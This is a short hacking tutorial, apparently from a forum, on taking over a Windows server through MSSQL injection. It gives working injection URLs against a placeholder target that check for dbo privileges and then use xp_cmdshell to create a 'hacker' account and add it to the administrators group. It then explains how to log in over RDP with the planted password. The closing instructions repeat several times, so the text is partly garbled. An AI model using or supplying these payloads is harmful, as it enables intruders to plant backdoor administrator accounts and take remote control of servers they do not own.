 |
| Rooting/RDP A Windows Box via MSSQL Injection |
Step 1.
Introduction: MSSQL-injection, can be used for products that are created by well-known company Microsoft.Check if the privileges are ‘dbo’ which means Database Owner (dbo).
EXAMPLE:
www.target.com/news.asp?id=1
- If it shows something like ‘dbo’ means this page has weaknesses and you can root it.
EXAMPLE:
www.target.com/news.asp?id=convert(int,(select+user))–
Step 2.
Adding a User Account:
EXAMPLE:
www.target.com/news.asp?id=;exec master..xp_cmdshell ‘net user hacker /add’;–
//here uname=hacker and passwd=123456..you can change it...
Step 3.
Adding to Admins Group:
EXAMPLE:
www.target.com/news.asp?id=;exec master..xp_cmdshell ‘net localgroup administrators hacker /add’;–you done...now open run, type mstsc and hit enter..then write the ip of the server..Login screen will come..
type uname=hacker
passwd=123456
Done !! :) )
now open run, type mstsc and hit enter !!
then write the ip of the server !!
your are in...!
type uname=hacker
passwd=123456
Done !! :) )
now open run, type mstsc and hit enter !!
then write the ip of the server !!
Login screen will come..
type uname=hacker
passwd=123456
your are in...!
